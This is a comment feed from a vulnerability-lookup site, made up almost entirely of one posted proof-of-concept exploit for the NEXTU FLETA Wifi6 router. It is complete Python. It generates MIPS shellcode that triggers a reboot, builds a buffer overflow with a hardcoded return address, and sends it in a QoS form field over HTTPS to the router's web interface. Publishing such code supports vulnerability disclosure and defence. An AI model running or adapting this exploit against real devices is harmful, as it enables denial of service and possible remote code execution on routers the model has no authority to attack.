Most recent comments.

https://cve.circl.lu/comments/feed Most recent comments. 2025-12-26T22:04:20.389357+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent comments. https://cve.circl.lu/comment/8b27e542-2740-435c-9317-55790ef4965b NEXTU FLETA Wifi6 Router DOS, Potential RCE POC 2025-12-26T22:04:20.392911+00:00 Cédric Bonhomme http://cve.circl.lu/user/cedric ```python from pwn import * from hackebds import * def shutdown_shell_code(): context.update(arch='mips', os='linux', bits=32, endian='little') cmd = "/bin/sh" args = ["autoreboot"] asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit() shellcode = asm(asmcode) return shellcode power_off_code = shutdown_shell_code() gap_code = (b'A') * 0x138 # This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow. # For example I fixed address as 0x7f854710 RET_address = (b'\x10\x47\x85\x7f') stack_gap = (b'C') * 0x40 print("power_off_code_length") print(len(power_off_code)) final_code = power_off_code + gap_code + RET_address + stack_gap import socket import ssl # Server Address and Port HOST = '192.168.1.254' PORT = 443 # Create an SSL socket for HTTPS connection context = ssl.create_default_context() context.set_ciphers('HIGH:!DH:!aNULL') context.check_hostname = False context.verify_mode = ssl.CERT_NONE with socket.create_connection((HOST, PORT)) as sock: with context.wrap_socket(sock, server_hostname=HOST) as ssock: # Prepare the shellcode as bytes (e.g., b'\x00\x01\x02'; replace with appropriate values for actual use) # parameter for evade verification send_byte = b"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=" + final_code # POST request headers headers = b"POST /boafrm/formIpQoS HTTP/1.1\r\n" \ b"Host: " + HOST.encode('utf-8') + b"\r\n" \ b"Content-Type: application/octet-stream\r\n" \ b"Content-Length: " + str(len(send_byte)).encode( 'utf-8') + b"\r\nConnection: close\r\n\r\n" # Send request (combine headers and body) ssock.send(headers + send_byte) # Receive response response = b"" while True: data = ssock.recv(1024) if not data: break response += data #Print response print(response.decode('utf-8')) ``` 2025-02-07T03:41:54.937264+00:00